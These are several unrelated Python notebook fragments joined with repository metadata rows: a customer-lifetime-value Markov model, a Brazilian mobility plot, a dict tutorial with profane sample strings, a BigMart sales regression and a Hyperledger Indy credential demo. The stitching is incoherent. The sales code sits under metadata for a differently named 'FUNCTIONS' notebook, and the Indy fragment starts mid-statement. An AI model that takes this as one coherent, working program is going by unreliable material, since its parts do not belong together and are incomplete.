        elif i >= 13 and i != j:
            transition_prob = 0
        else:
            # empirical transition frequency (Counter returns 0 for unseen j)
            transition_prob = total_transition_states_dict[i][j] / total_in_state_dict[i]
        RFM_transition_matrix[i-1, j-1] = transition_prob
# -
pd.DataFrame(RFM_transition_matrix)
# +
# build state matrices for all customers that started after 2005
# A customer "starts" in the first year they purchase; each pass strips the
# leading no-purchase year so every cohort's matrix begins at its first purchase.
years = ['2005', '2006', '2007', '2008', '2009', '2010', '2011', '2012', '2013', '2014']
boolean_matrix_test = boolean_matrix.copy()
state_dataframes = []
for year in years:
    # customers with no purchase in `year` but a first purchase the year after
    no_purchase_first_year = boolean_matrix_test[boolean_matrix_test[year] == 0]
    first_purchase_next_year = no_purchase_first_year[no_purchase_first_year[str(int(year)+1)] == 1]
    # drop the empty leading year for this cohort
    first_purchase_next_year.drop(year, axis=1, inplace=True)
    recency_matrix_here, RFM_matrix_here = build_recency_and_RFM_matrix(first_purchase_next_year, transactions)
    state_matrix_here = convert_to_state_matrix(RFM_matrix_here, RFM_states)
    state_df_here = pd.DataFrame(state_matrix_here)
    state_df_here.columns = first_purchase_next_year.columns
    state_df_here.index = first_purchase_next_year.index
    state_dataframes.append(state_df_here)
    # this cohort is handled; drop its first year before the next pass
    boolean_matrix_test.drop(year, axis=1, inplace=True)
# +
# Total customers observed in each state in 2015, pooled across all cohorts.
initial_counter = Counter(state_df['2015'])
for individual_state_df in state_dataframes:
    individual_counter = Counter(individual_state_df['2015'])
    initial_counter += individual_counter
# +
# build starting state vector: customers per state (1..18) observed in 2015
# BUG FIX: the original appended `starting_state_counts[i]`, a name that is
# never defined anywhere (NameError); the counts live in `initial_counter`.
# A Counter returns 0 for missing keys, which also covers the old `else`
# branch that appended 0.
starting_state = np.array([initial_counter[i] for i in range(1, 19)])
# -
starting_state
# +
# Distribution of the states new customers enter in their first observed
# year, pooled across every cohort.
new_customer_state_counts = Counter(state_df['2005'])
total_new_customers = [state_df['2005'].count()]
for individual_state_df in state_dataframes:
    new_customer_state_counts += Counter(individual_state_df[individual_state_df.columns[0]])
    total_new_customers.append(individual_state_df.shape[0])
# //1 floors the mean to a whole number of customers
average_new_customers = np.mean(total_new_customers)//1
new_customer_state_dist = {}
for state, state_count in new_customer_state_counts.items():
    new_customer_state_dist[state] = state_count/np.sum(total_new_customers)
new_customer_state_dist
# Expected number of new customers arriving in each state every year.
# NOTE(review): only states 4, 5 and 6 are populated here -- assumes every
# key of new_customer_state_dist is in {4, 5, 6}; verify.
new_state_vector_each_year = np.zeros(18)
new_state_vector_each_year[3] = average_new_customers*new_customer_state_dist[4]//1
new_state_vector_each_year[4] = average_new_customers*new_customer_state_dist[5]//1
new_state_vector_each_year[5] = average_new_customers*new_customer_state_dist[6]//1
new_state_vector_each_year
# +
# build the reward vector: yearly profit per customer by state.
# States 1-6 earn the average purchase amount minus 25, states 7-12 only
# incur the 25, states 13-18 earn nothing.
# NOTE(review): the 25 looks like a per-customer marketing/contact cost -- confirm.
avg_purchase_amt = purchase_amts.mean()
reward_vector = np.zeros(18)
for i in range(6):
    reward_vector[i] = avg_purchase_amt - 25
for i in range(6, 12):
    reward_vector[i] = - 25
for i in range(12, 18):
    reward_vector[i] = 0
# +
# Expected discounted lifetime value per starting state:
# CLV = (I - (1+d)^-1 * P)^-1 . reward   (infinite-horizon discounted sum)
I_18 = np.identity(18)
CLV = (np.linalg.inv(I_18 - (1+d)**(-1)*RFM_transition_matrix)).dot(reward_vector)
CLV.reshape(len(CLV),1)
# +
# without policy: simulate 10 years of total revenue with no intervention
revenue_no_policy = []
# NOTE(review): on this first line new_state_vector_each_year is added to the
# *reward* (operator precedence: the reward_vector product binds first),
# while inside the loop below it is added to the *state* before multiplying
# by the reward -- the two year-1 treatments are inconsistent; confirm intent.
total_reward = reward_vector*(((1+d)**-1)*RFM_transition_matrix).dot(starting_state)+new_state_vector_each_year
new_state = starting_state.copy()
revenue_no_policy.append(np.sum(total_reward))
for i in range(9):
    # advance one year: discounted transition plus the yearly influx of new customers
    new_state = (((1+d)**-1)*RFM_transition_matrix).dot(new_state)+new_state_vector_each_year
    reward_this_year = reward_vector*new_state
    revenue_no_policy.append(np.sum(reward_this_year))
    total_reward += reward_this_year
revenue_no_policy
# -
np.sum(revenue_no_policy)

# yearly revenue table starting in 2016
for year, rev in enumerate(revenue_no_policy, 2016):
    print(str(year) + "\t" + str(rev))
# +
# with policy: same simulation, but stop incurring costs for states 9-18
# (reward_vector_with_policy[8:] = 0 zeroes indices 8..17, i.e. states 9..18)
revenue_with_policy = []
reward_vector_with_policy = reward_vector.copy()
# set all the negative CLVs to zero
reward_vector_with_policy[8:] = 0
# NOTE(review): same year-1 precedence inconsistency as in the no-policy run.
total_reward = reward_vector_with_policy*(((1+d)**-1)*RFM_transition_matrix).dot(starting_state)+new_state_vector_each_year
new_state = starting_state.copy()
revenue_with_policy.append(np.sum(total_reward))
for i in range(9):
    new_state = (((1+d)**-1)*RFM_transition_matrix).dot(new_state)+new_state_vector_each_year
    reward_this_year = reward_vector_with_policy*new_state
    revenue_with_policy.append(np.sum(reward_this_year))
    total_reward += reward_this_year

# yearly revenue table starting in 2016
money = []
for year, rev in enumerate(revenue_with_policy, 2016):
    print(str(year) + "\t" + str(rev))
    money.append(str(year) + "\t" + str(rev))
# +
# histogram of how many years each customer made a purchase in
fig, axs = plt.subplots(1,1, figsize = (10,5))
total_purchases = boolean_matrix_restricted.apply(lambda x: sum(x), axis=1)
axs.hist(total_purchases, bins=11)
axs.set_title("Histogram of Total Purchases")
axs.set_xlabel("Total Purchases Made")
axs.set_ylabel("Count")
# -
np.sum(revenue_with_policy)

# inspect the model vectors
reward_vector.reshape(18, 1)
CLV.reshape(18,1)
np.sum(new_state_vector_each_year)
| 13,618 |
/1FP.ipynb
|
3f8c5553dcc47b829fb79565ed02a5c767b61b9b
|
[] |
no_license
|
LaelRodrigues/Projeto1_ciencia_de_dados
|
https://github.com/LaelRodrigues/Projeto1_ciencia_de_dados
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 204,666 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + id="Fho7ubzP7TnT"
# !pip install pandas-profiling==2.9.0
# + id="QebfAOeq7-U7"
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
import pandas_profiling
import matplotlib.dates as md
# + id="B-yAuWqJ8Gxo"
# Google COVID-19 Community Mobility Report (global CSV, updated regularly)
link = "https://www.gstatic.com/covid19/mobility/Global_Mobility_Report.csv"
data = pd.read_csv(link)
data.head()
# + id="2-FD6VAE8MGW"
data.info()
# + id="GYlvQDsK8UgL"
data.head()
# + id="J9KSLpgN8vdK"
data.country_region.unique()
# + id="uUewHeHb8wSQ"
# Keep only Brazil, select region/date/mobility columns by position, rename
# them, and index the frame by date.
data_br = data.loc[data.country_region == "Brazil",:].iloc[:,[1,2,3,7,8,9,10,11,12,13]].copy()
data_br.columns = ["country","state","city","date","retail","grocery","parks","transit","workplaces","residential"]
data_br.date = pd.to_datetime(data_br.date)
data_br.index = data_br.date
data_br.drop(labels="date",axis=1,inplace=True)
data_br
# + id="Mk63pjiE87Hj"
data_br.info()
# + id="bjdnbbZzGpP2"
# List every distinct city in the Brazilian data.
cities = data_br.city.unique()
# idiom fix: iterate the array directly instead of `for i in range(len(...))`;
# the printed output is identical.
for city in cities:
    print(city)
# + id="W5sHYnXMHkP-"
# NOTE(review): "Brasiléia" is a town in Acre, not the capital; this rename
# treats its rows as "Brasília" -- presumably a data-quirk workaround, confirm.
data_br.city = data_br.city.str.replace("Brasiléia","Brasília")
# Keep only the 27 state capitals. Series.isin replaces the original chain of
# 27 `==` comparisons joined with `|`; it selects exactly the same rows.
capitals = ["Rio Branco", "Maceió", "Macapá", "Manaus", "Salvador",
            "Fortaleza", "Brasília", "Vitória", "Goiânia", "São Luís",
            "Cuiabá", "Campo Grande", "Belo Horizonte", "Belém",
            "João Pessoa", "Curitiba", "Recife", "Teresina",
            "Rio de Janeiro", "Natal", "Porto Alegre", "Porto Velho",
            "Boa Vista", "Florianópolis", "São Paulo", "Aracaju", "Palmas"]
data_br_capital = data_br.loc[data_br.city.isin(capitals), :]
# + id="As48cD79Shvh"
data_br_capital.head()
# + id="9iR1w1Zmlpu1"
# Drop rows with no retail reading, then print the first remaining city and
# every retail value recorded for Rio de Janeiro.
data_br_capital = data_br_capital.loc[~data_br_capital.retail.isnull()].copy()
lin, col = data_br_capital.shape
print(data_br_capital.iloc[0]["city"])
# perf/idiom fix: a vectorized boolean mask replaces the original row-by-row
# `.iloc[i]` scan (one slow positional lookup per row); printed output is identical.
for retail_value in data_br_capital.loc[data_br_capital["city"] == "Rio de Janeiro", "retail"]:
    print(retail_value)
# + id="xvhm5i9g8oNi"
plt.style.use("fivethirtyeight")
# + id="1UiR79d09jrr" executionInfo={"status": "ok", "timestamp": 1601673842932, "user_tz": 180, "elapsed": 5788, "user": {"displayName": "ROBSON LAEL", "photoUrl": "", "userId": "06544713249749143700"}} outputId="05fa2024-e411-4b84-9426-558e03bd8db6" colab={"base_uri": "https://localhost:8080/", "height": 375}
# One panel per highlighted capital: every capital's 7-day rolling mobility
# curve in grey, the highlighted capital in blue, with markers at its minimum
# and at the latest reading plus a percentage-recovery annotation.
# NOTE(review): `capital` is reused as both the list and the loop variable,
# and `min` shadows the builtin -- works, but worth renaming.
fig, ax = plt.subplots(nrows=1,ncols=5,figsize=(16,4))
item = "retail"
capital = ["São Paulo","Rio de Janeiro","Salvador","Fortaleza", "Belo Horizonte"]
for i,capital in enumerate(capital):
    # all capitals as a grey background
    data_br_capital.groupby(by=[data_br_capital.index,"city"]).mean().unstack()[item].rolling(window=7).mean().plot(legend=False,color="grey",linewidth=1, alpha=0.4, ax=ax[i])
    # the highlighted capital on top, in blue
    data_br_capital.groupby(by=[data_br_capital.index,"city"]).mean().unstack()[item][capital].rolling(window=7).mean().plot(legend=False,color="blue",linewidth=3, alpha=0.6, ax=ax[i])
    dd = data_br_capital.groupby(by=[data_br_capital.index,"city"]).mean().unstack()[item][capital].rolling(window=7).mean().copy()
    # the first 6 rolling values are NaN (window=7), so iloc[6] is the first
    # real value; count() excludes NaN, so count()+5 indexes the last entry
    min = dd.iloc[6]
    last = dd.iloc[dd.count()+5]
    index_last = dd.index[dd.count()+5]
    minX = 0
    j = 7
    # linear scan for the series minimum, its date, and a label position
    for j in range(dd.count()):
        if(dd.iloc[j] < min):
            minX = j+1
            min = dd.iloc[j]
            index = dd.index[j]
            # label position: 30 days before the minimum
            positionValue = dd.index[j-30]
    ax[i].set_title(capital,fontsize=12,ha='right')
    ax[i].xaxis.grid(False)
    ax[i].set_xlabel("")
    ax[i].set_xticklabels(["","mar 1","","","","","sept 16"])
    ax[i].set_xlim([dd.index[0],md.datetime.timedelta(days=20) + dd.index[dd.count()-1]])
    ax[i].xaxis.set_tick_params(labelsize=10)
    ax[i].yaxis.set_tick_params(labelsize=10)
    # dots at the minimum and at the latest value
    ax[i].scatter(index, min, c="blue", s=150, edgecolors="white", lw=2)
    ax[i].scatter(index_last, last, c="blue", s=150, edgecolors="white", lw=2)
    ax[i].axhline(y=min, xmin=((minX/dd.count())+0.02), xmax=0.94, linewidth=2, c='grey', linestyle='dashed')
    # v/f map data values into axes-fraction coordinates for the vertical
    # dashed "recovery" line.
    # NOTE(review): the 20/113/108 constants look hand-tuned to fixed y-limits -- confirm.
    v = abs(((abs(min)+20)/113)-1)
    f = abs(((abs(last-3)+20)/108)-1)
    ax[i].axvline(x=index_last, ymin=v, ymax=f, linewidth=2, c='red', linestyle='dashed')
    ax[i].annotate(s='', xy=(index_last, last-3), xytext=(index_last, last-5), arrowprops=dict(facecolor ='red', linewidth = 2, headwidth=9))
    # numeric labels: latest value, minimum, and percentage recovery
    ax[i].text(dd.index[dd.count()-12], last+5, str(int(last)) , dict(size=12), color='black', weight="bold")
    ax[i].text(positionValue, min, str(int(min)) , dict(size=12), color='black', weight="bold")
    v = int(abs(((last/min)-1)*100))
    s = str(v) + '%'
    ax[i].text(dd.index[dd.count()-32], -(abs((min+last)/2) + 7), s , dict(size=12), color='red', weight="bold")
    # y tick labels only on the outermost panels
    if (i==0) or (i==4):
        ax[i].yaxis.tick_right()
    else:
        ax[i].set_yticklabels([])
plt.savefig("capital.png",dpi=300)
plt.show()
# # 字典常见操作
# +
# Accessing data
d = {"one":1, "two":2, "three":3}
# note the access syntax:
# the key goes inside the square brackets
print(d["one"])
d["one"] = "eins"
print(d)
# deleting an entry
# use the del statement
del d["one"]
print(d)
# +
# Membership tests: in, not in
# NOTE: membership tests check the KEYS, not the values
d = {"one":1, "two":2, "three":3}
if 2 in d:
    print("value")      # not printed: 2 is a value, not a key
if "two" in d:
    print("key")        # printed: "two" is a key
if ("two",2) in d:
    print("kv")         # not printed: a (key, value) pair is not a key
# +
# Iteration differs a lot between Python 2 and 3; the code is not portable
# iterate by key with a for loop
d = {"one":1, "two":2, "three":3}
# a for loop over the dict yields its keys directly
for k in d:
    print(k, d[k])
# the loop above can equivalently be written as
for k in d.keys():
    print(k, d[k])
# iterate over just the values
for v in d.values():
    print(v)
# note this special form: unpack (key, value) pairs
for k,v in d.items():
    print(k,'--',v)
# -
# # Dict comprehensions
# +
d = {"one":1, "two":2, "three":3}
# plain dict comprehension
dd = {k:v for k,v in d.items()}
print(dd)
# dict comprehension with a filter condition
dd = {k:v for k,v in d.items() if v % 2 == 0}
print(dd)
# -
# # Dict-related functions
# generic functions: len, max, min, dict
# str(dict): returns the string form of the dict
d = {"one":1, "two":2, "three":3}
print(str(d))
# +
# clear: empties the dict
# items: returns the dict's key/value pairs as tuples (a view object)
d = {"one":1, "two":2, "three":3}
i = d.items()
print(type(i))
print(i)
# -
# keys: returns a view of the dict's keys
k = d.keys()
print(type(k))
print(k)
# values: likewise, an iterable view
v = d.values()
print(type(v))
print(v)
# +
# get: returns the value for the given key; the advantage is that a
# default can be supplied
d = {"one":1, "two":2, "three":3}
print(d.get("on333"))
# get's default is None, but it can be overridden
print(d.get("one", 100))
print(d.get("one333", '没这玩应'))
# compare with the lines above: subscripting a missing key raises KeyError
print(d['on333'])
# -
# fromkeys: use the given sequence as the keys and a single value as the
# value for every key
l = ["eins", "zwei", "drei"]
# note the types of fromkeys' two arguments
# note that fromkeys is called on the dict class itself
d = dict.fromkeys(l, "hahahahahah")
print(d)

# update accepts an iterable of key/value pairs; note d2 is a SET literal,
# so the order of the pair it contributes is arbitrary -- fragile demo code
d1 = {}
d2 = {'name', 'bitch'}
d1.update([d2,['fuck', 'yes']])
print(d1)

help(dict
)
| 6,919 |
/Data-Science-HYD-2k19/Topic-Wise/FUNCTIONS/FUNCTIONS (Definitions and Call).ipynb
|
38e88e7840bcd4f178ec8cd4921e7d75d5138e62
|
[] |
no_license
|
Sanjay9921/Python
|
https://github.com/Sanjay9921/Python
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 11,155 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import pandas as pd
train = pd.read_csv('train.csv')
test = pd.read_csv('test.csv')
train.head(5)
train.isnull().sum()
train['Item_Weight'].describe()
train['Outlet_Size'].describe()
# +
# fill na of the columns
train['Item_Weight'].fillna(train['Item_Weight'].mean(), inplace = True)
test['Item_Weight'].fillna(test['Item_Weight'].mean(), inplace = True)
# BUG FIX: Series.mode() returns a Series; fillna with a Series aligns on the
# index, so only the row labelled 0 was ever filled. Use the scalar mode()[0].
train['Outlet_Size'].fillna(train['Outlet_Size'].mode()[0], inplace = True)
test['Outlet_Size'].fillna(test['Outlet_Size'].mode()[0], inplace = True)
# BUG FIX: the intent (per the original "change 0 values to mean" comment)
# was to replace zero visibility readings, but fillna only touches NaN.
# Replace the zeros with the mean of the non-zero readings, and keep filling
# any genuine NaN the same way.
train_viz_mean = train['Item_Visibility'][train['Item_Visibility'] != 0].mean()
train['Item_Visibility'] = train['Item_Visibility'].replace(0, train_viz_mean).fillna(train_viz_mean)
test_viz_mean = test['Item_Visibility'][test['Item_Visibility'] != 0].mean()
test['Item_Visibility'] = test['Item_Visibility'].replace(0, test_viz_mean).fillna(test_viz_mean)
# +
# consolidate: the first two characters of Item_Identifier encode the broad
# product category (FD=Food, NC=Non-Consumable, DR=Drinks)
train['Items_category'] = train['Item_Identifier'].apply(lambda x: x[0:2])
train['Items_category'] = train['Items_category'].map({'FD':'Food','NC':'Non-Consumable','DR':'Drinks'})
train['Items_category'].value_counts()
test['Items_category'] = test['Item_Identifier'].apply(lambda x: x[0:2])
test['Items_category'] = test['Items_category'].map({'FD':'Food','NC':'Non-Consumable','DR':'Drinks'})
test['Items_category'].value_counts()
# -
import matplotlib.pyplot as plt
import seaborn as sns
# Item_Identifier is a pure ID column, so inspect the outlet distribution instead.
# BUG FIX: the original referenced `value_counts` without calling it, which just
# evaluates to the bound method object and computes nothing.
train['Outlet_Identifier'].value_counts()
# +
# categorical columns at a glance: a bar chart of each one's value counts
plt.figure(1)
plt.subplot(321)
train['Item_Fat_Content'].value_counts().plot.bar(figsize=(24,10), title= 'Fat_Content')
plt.subplot(322)
train['Item_Type'].value_counts().plot.bar(title = 'Item Type')
plt.subplot(323)
train['Outlet_Identifier'].value_counts().plot.bar(title = 'Outlet Identifier')
plt.subplot(324)
train['Outlet_Size'].value_counts().plot.bar(title = 'Outlet Size')
plt.subplot(325)
train['Outlet_Location_Type'].value_counts().plot.bar(title = 'Outlet Location Type')
plt.subplot(326)
train['Outlet_Type'].value_counts().plot.bar(title = 'Outlet Type')
plt.tight_layout()
plt.show()
# +
# replace mis-spelled labels: normalize Item_Fat_Content to just
# "Low Fat" and "Regular" (Series.replace matches whole cell values)
train['Item_Fat_Content'].replace('LF', 'Low Fat', inplace = True)
train['Item_Fat_Content'].replace('low fat', 'Low Fat', inplace = True)
train['Item_Fat_Content'].replace('reg', 'Regular', inplace = True)
test['Item_Fat_Content'].replace('LF', 'Low Fat', inplace = True)
test['Item_Fat_Content'].replace('low fat', 'Low Fat', inplace = True)
test['Item_Fat_Content'].replace('reg', 'Regular', inplace = True)
# -

# drop the pure-ID column before modelling
train_1 = train.drop('Item_Identifier', axis = 1)
test_1 = test.drop('Item_Identifier', axis = 1)
# +
# distribution plot + boxplot for each numeric column
plt.figure(1)
plt.subplot(121)
sns.distplot(train['Item_Weight'])
plt.subplot(122)
train['Item_Weight'].plot.box(figsize = (20,5))
# +
plt.figure(1)
plt.subplot(121)
sns.distplot(train['Item_Visibility'])
plt.subplot(122)
train['Item_Visibility'].plot.box(figsize = (20,5))
# +
plt.figure(1)
plt.subplot(121)
sns.distplot(train['Item_MRP'])
plt.subplot(122)
train['Item_MRP'].plot.box(figsize = (20,5))
# +
plt.figure(1)
plt.subplot(121)
sns.distplot(train['Outlet_Establishment_Year'])
plt.subplot(122)
train['Outlet_Establishment_Year'].plot.box(figsize = (20,5))
# +
# the regression target
plt.figure(1)
plt.subplot(121)
sns.distplot(train['Item_Outlet_Sales'])
plt.subplot(122)
train['Item_Outlet_Sales'].plot.box(figsize = (20,5))
# -
# ### Bivariate Analysis
# ### Pre Process the data
# +
# Label encoding
from sklearn.preprocessing import LabelEncoder
cat_cols = ['Item_Fat_Content', 'Item_Type', 'Outlet_Identifier','Outlet_Location_Type', 'Outlet_Type','Items_category']
# NOTE(review): fitting a fresh LabelEncoder per column on train and test
# separately can assign different integer codes to the same category in the
# two frames -- consider fitting one encoder on the combined values.
for col in cat_cols:
    train_1[col] = LabelEncoder().fit_transform(train_1[col])
for col in cat_cols:
    test_1[col] = LabelEncoder().fit_transform(test_1[col])
# -
# astype(str) coerces any remaining NaN/non-string Outlet_Size values into
# plain strings so the encoder can handle the column
train_1['Outlet_Size'] = LabelEncoder().fit_transform(train_1['Outlet_Size'].astype(str))
test_1['Outlet_Size'] = LabelEncoder().fit_transform(test_1['Outlet_Size'].astype(str))
# +
# standard Scale: z-score the features and log-transform the target so it is
# closer to normal (predictions are exponentiated back later with np.exp)
from sklearn.preprocessing import StandardScaler
import numpy as np
X_train = train_1.drop('Item_Outlet_Sales', axis = 1)
y_train = np.log(train_1['Item_Outlet_Sales'])
X_test = test_1.copy()
# NOTE(review): the scaler is fit separately on train and test; the standard
# approach is to fit on train only and transform test with that same scaler.
X_train_Scale = StandardScaler().fit_transform(X_train)
X_test_Scale = StandardScaler().fit_transform(X_test)
# -
# ### Model Building
# +
def _fit_predict_submit(model, out_csv):
    """Fit `model` on the scaled training data, predict the scaled test set,
    and write a submission CSV named `out_csv`.

    Predictions are exponentiated with np.exp to undo the log transform that
    was applied to the training target.
    """
    model.fit(X_train_Scale, y_train)
    y_pred = model.predict(X_test_Scale)
    submission = pd.read_csv("sample.csv")
    submission['Item_Outlet_Sales'] = np.exp(y_pred)
    submission['Item_Identifier'] = test['Item_Identifier']
    submission['Outlet_Identifier'] = test['Outlet_Identifier']
    pd.DataFrame(submission, columns=['Item_Identifier','Outlet_Identifier','Item_Outlet_Sales']).to_csv(out_csv, index = False)

# The five model cells below were identical except for the estimator and the
# output filename, so the shared fit/predict/submit logic is factored out.
# The model_* bindings are kept for any later cells that inspect them.

# linear regression model
from sklearn.linear_model import LinearRegression
model_lr = LinearRegression()
_fit_predict_submit(model_lr, 'linear.csv')

# ridge regression model
from sklearn.linear_model import Ridge
model_rd = Ridge(alpha=0.5)
_fit_predict_submit(model_rd, 'ridge.csv')

# support vector regression
from sklearn.svm import SVR
model_svr = SVR()
_fit_predict_submit(model_svr, 'svr.csv')

# decision tree regressor
from sklearn.tree import DecisionTreeRegressor
model_dtr = DecisionTreeRegressor(random_state=111)
_fit_predict_submit(model_dtr, 'dtr.csv')

# random forest regressor
from sklearn.ensemble import RandomForestRegressor
model_rfr = RandomForestRegressor(random_state=111,n_estimators=200,max_depth=5, min_samples_leaf=100,n_jobs=4)
_fit_predict_submit(model_rfr, 'rfr.csv')
# -
# #support vector
# from sklearn.svm import SVR
# from sklearn.model_selection import KFold, GridSearchCV, StratifiedKFold
#
# k_fold = KFold(n_splits = 10)
#
# parameters = [{'C': [0.1, 1, 10, 100, 1000],'gamma': [1,0.1,0.01, 0.001, 0.0001],'kernel': ['rbf']},
# {'C':[0.1, 1, 10, 100, 1000], 'kernel' :['linear']},
# {'C':[0.1, 1, 10, 100, 1000], 'kernel' :['poly'], 'degree' : [0,1,2,3,4,5]}]
#
# model_svc_gs = GridSearchCV(estimator = SVR(), param_grid = parameters, cv = k_fold, refit = True)
# model_svc_gs.fit(X_train,y_train)
#
# print('The best parameter is {}'.format(model_svc_gs.best_params_))
#
#
#
# +
# SVR with the best hyper-parameters found by the (commented-out) grid search above
model_svr_1 = SVR(C = 1000, gamma = 0.0001)
model_svr_1.fit(X_train_Scale, y_train)
y_pred = model_svr_1.predict(X_test_Scale)
submission=pd.read_csv("sample.csv")
# undo the log transform that was applied to the training target
submission['Item_Outlet_Sales']=np.exp(y_pred)
submission['Item_Identifier']=test['Item_Identifier']
submission['Outlet_Identifier']=test['Outlet_Identifier']
pd.DataFrame(submission, columns=['Item_Identifier','Outlet_Identifier','Item_Outlet_Sales']).to_csv('svr_1.csv', index = False)
# -
, acme_did, job_certificate_schema,
'TAG1', 'CL', '{"support_revocation": false}')
print("\"Acme\" -> Send \"Acme Job-Certificate\" Credential Definition to Ledger")
await send_cred_def(pool_handle, acme_wallet, acme_did, acme_job_certificate_cred_def_json)
print("==============================")
print("=== Getting Transcript with Faber ==")
print("==============================")
print("== Getting Transcript with Faber - Onboarding ==")
print("------------------------------")
alice_wallet_name = 'alice_wallet'
alice_wallet_credentials = json.dumps({"key": "alice_wallet_key"})
alice_wallet, faber_alice_key, alice_faber_did, alice_faber_key, faber_alice_connection_response \
= await onboarding(pool_handle, pool_name, "Faber", faber_wallet, faber_did, "Alice", None,
alice_wallet_name, alice_wallet_credentials)
print("==============================")
print("== Getting Transcript with Faber - Getting Transcript Credential ==")
print("------------------------------")
print("\"Faber\" -> Create \"Transcript\" Credential Offer for Alice")
transcript_cred_offer_json = \
await anoncreds.issuer_create_credential_offer(faber_wallet, faber_transcript_cred_def_id)
print("\"Faber\" -> Get key for Alice did")
alice_faber_verkey = await did.key_for_did(pool_handle, acme_wallet, faber_alice_connection_response['did'])
print("\"Faber\" -> Authcrypt \"Transcript\" Credential Offer for Alice")
authcrypted_transcript_cred_offer = await crypto.auth_crypt(faber_wallet, faber_alice_key, alice_faber_verkey,
transcript_cred_offer_json.encode('utf-8'))
print("\"Faber\" -> Send authcrypted \"Transcript\" Credential Offer to Alice")
print("\"Alice\" -> Authdecrypted \"Transcript\" Credential Offer from Faber")
faber_alice_verkey, authdecrypted_transcript_cred_offer_json, authdecrypted_transcript_cred_offer = \
await auth_decrypt(alice_wallet, alice_faber_key, authcrypted_transcript_cred_offer)
print("\"Alice\" -> Create and store \"Alice\" Master Secret in Wallet")
alice_master_secret_id = await anoncreds.prover_create_master_secret(alice_wallet, None)
print("\"Alice\" -> Get \"Faber Transcript\" Credential Definition from Ledger")
(faber_transcript_cred_def_id, faber_transcript_cred_def) = \
await get_cred_def(pool_handle, alice_faber_did, authdecrypted_transcript_cred_offer['cred_def_id'])
print("\"Alice\" -> Create \"Transcript\" Credential Request for Faber")
(transcript_cred_request_json, transcript_cred_request_metadata_json) = \
await anoncreds.prover_create_credential_req(alice_wallet, alice_faber_did,
authdecrypted_transcript_cred_offer_json,
faber_transcript_cred_def, alice_master_secret_id)
print("\"Alice\" -> Authcrypt \"Transcript\" Credential Request for Faber")
authcrypted_transcript_cred_request = await crypto.auth_crypt(alice_wallet, alice_faber_key, faber_alice_verkey,
transcript_cred_request_json.encode('utf-8'))
print("\"Alice\" -> Send authcrypted \"Transcript\" Credential Request to Faber")
print("\"Faber\" -> Authdecrypt \"Transcript\" Credential Request from Alice")
alice_faber_verkey, authdecrypted_transcript_cred_request_json, _ = \
await auth_decrypt(faber_wallet, faber_alice_key, authcrypted_transcript_cred_request)
print("\"Faber\" -> Create \"Transcript\" Credential for Alice")
transcript_cred_values = json.dumps({
"first_name": {"raw": "Alice", "encoded": "1139481716457488690172217916278103335"},
"last_name": {"raw": "Garcia", "encoded": "5321642780241790123587902456789123452"},
"degree": {"raw": "Bachelor of Science, Marketing", "encoded": "12434523576212321"},
"status": {"raw": "graduated", "encoded": "2213454313412354"},
"ssn": {"raw": "123-45-6789", "encoded": "3124141231422543541"},
"year": {"raw": "2015", "encoded": "2015"},
"average": {"raw": "5", "encoded": "5"}
})
transcript_cred_json, _, _ = \
await anoncreds.issuer_create_credential(faber_wallet, transcript_cred_offer_json,
authdecrypted_transcript_cred_request_json,
transcript_cred_values, None, None)
print("\"Faber\" -> Authcrypt \"Transcript\" Credential for Alice")
authcrypted_transcript_cred_json = await crypto.auth_crypt(faber_wallet, faber_alice_key, alice_faber_verkey,
transcript_cred_json.encode('utf-8'))
print("\"Faber\" -> Send authcrypted \"Transcript\" Credential to Alice")
print("\"Alice\" -> Authdecrypted \"Transcript\" Credential from Faber")
_, authdecrypted_transcript_cred_json, _ = \
await auth_decrypt(alice_wallet, alice_faber_key, authcrypted_transcript_cred_json)
print("\"Alice\" -> Store \"Transcript\" Credential from Faber")
await anoncreds.prover_store_credential(alice_wallet, None, transcript_cred_request_metadata_json,
authdecrypted_transcript_cred_json, faber_transcript_cred_def, None)
print("==============================")
print("=== Apply for the job with Acme ==")
print("==============================")
print("== Apply for the job with Acme - Onboarding ==")
print("------------------------------")
alice_wallet, acme_alice_key, alice_acme_did, alice_acme_key, acme_alice_connection_response = \
await onboarding(pool_handle, pool_name, "Acme", acme_wallet, acme_did, "Alice", alice_wallet,
alice_wallet_name, alice_wallet_credentials)
print("==============================")
print("== Apply for the job with Acme - Transcript proving ==")
print("------------------------------")
print("\"Acme\" -> Create \"Job-Application\" Proof Request")
job_application_proof_request_json = json.dumps({
'nonce': '1432422343242122312411212',
'name': 'Job-Application',
'version': '0.1',
'requested_attributes': {
'attr1_referent': {
'name': 'first_name'
},
'attr2_referent': {
'name': 'last_name'
},
'attr3_referent': {
'name': 'degree',
'restrictions': [{'cred_def_id': faber_transcript_cred_def_id}]
},
'attr4_referent': {
'name': 'status',
'restrictions': [{'cred_def_id': faber_transcript_cred_def_id}]
},
'attr5_referent': {
'name': 'ssn',
'restrictions': [{'cred_def_id': faber_transcript_cred_def_id}]
},
'attr6_referent': {
'name': 'phone_number'
}
},
'requested_predicates': {
'predicate1_referent': {
'name': 'average',
'p_type': '>=',
'p_value': 4,
'restrictions': [{'cred_def_id': faber_transcript_cred_def_id}]
}
}
})
print("\"Acme\" -> Get key for Alice did")
alice_acme_verkey = await did.key_for_did(pool_handle, acme_wallet, acme_alice_connection_response['did'])
print("\"Acme\" -> Authcrypt \"Job-Application\" Proof Request for Alice")
authcrypted_job_application_proof_request_json = \
await crypto.auth_crypt(acme_wallet, acme_alice_key, alice_acme_verkey,
job_application_proof_request_json.encode('utf-8'))
print("\"Acme\" -> Send authcrypted \"Job-Application\" Proof Request to Alice")
print("\"Alice\" -> Authdecrypt \"Job-Application\" Proof Request from Acme")
acme_alice_verkey, authdecrypted_job_application_proof_request_json, _ = \
await auth_decrypt(alice_wallet, alice_acme_key, authcrypted_job_application_proof_request_json)
print("\"Alice\" -> Get credentials for \"Job-Application\" Proof Request")
creds_for_job_application_proof_request = json.loads(
await anoncreds.prover_get_credentials_for_proof_req(alice_wallet,
authdecrypted_job_application_proof_request_json))
print(creds_for_job_application_proof_request)
